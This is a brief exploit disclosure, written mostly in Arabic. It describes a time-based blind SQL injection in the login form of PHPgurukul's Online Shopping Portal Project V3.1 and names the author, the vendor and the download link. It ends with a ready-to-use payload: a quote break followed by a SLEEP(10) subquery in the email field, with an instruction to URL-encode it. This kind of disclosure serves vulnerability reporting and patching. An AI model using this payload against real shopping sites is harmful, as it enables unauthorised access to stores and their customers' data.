
poc
مشروع بوابة التسوق عبر الإنترنت V3.1 يسمح للمهاجمين عن بُعد بتنفيذ استعلامات SQL تعسفية عبر نموذج تسجيل الدخول، مما يؤدي إلى وصول غير مصرح به واحتمال التلاعب بالبيانات. ينشأ هذا الثغرة بسبب عدم كفاية التحقق من صحة الإدخال المقدم من المستخدم في حقل اسم المستخدم، مما يتيح هجمات حقن SQL.
عنوان الثغرة: Online Shopping Portal Project V3.1 PHPgurukul - Time-Based Blind Sqli
مؤلف الثغرة: Akshad Joshi
الصفحة الرئيسية للبائع: https://phpgurukul.com
رابط البرنامج: https://phpgurukul.com/shopping-portal-free-download/
تم الاختبار على: Linux
استخدم هذا الحمولة (قم بتشفير عنوان URL):
[email protected]' AND (SELECT 1866 FROM (SELECT(SLEEP(10)))JHcH) AND 'GMDH'='GMDH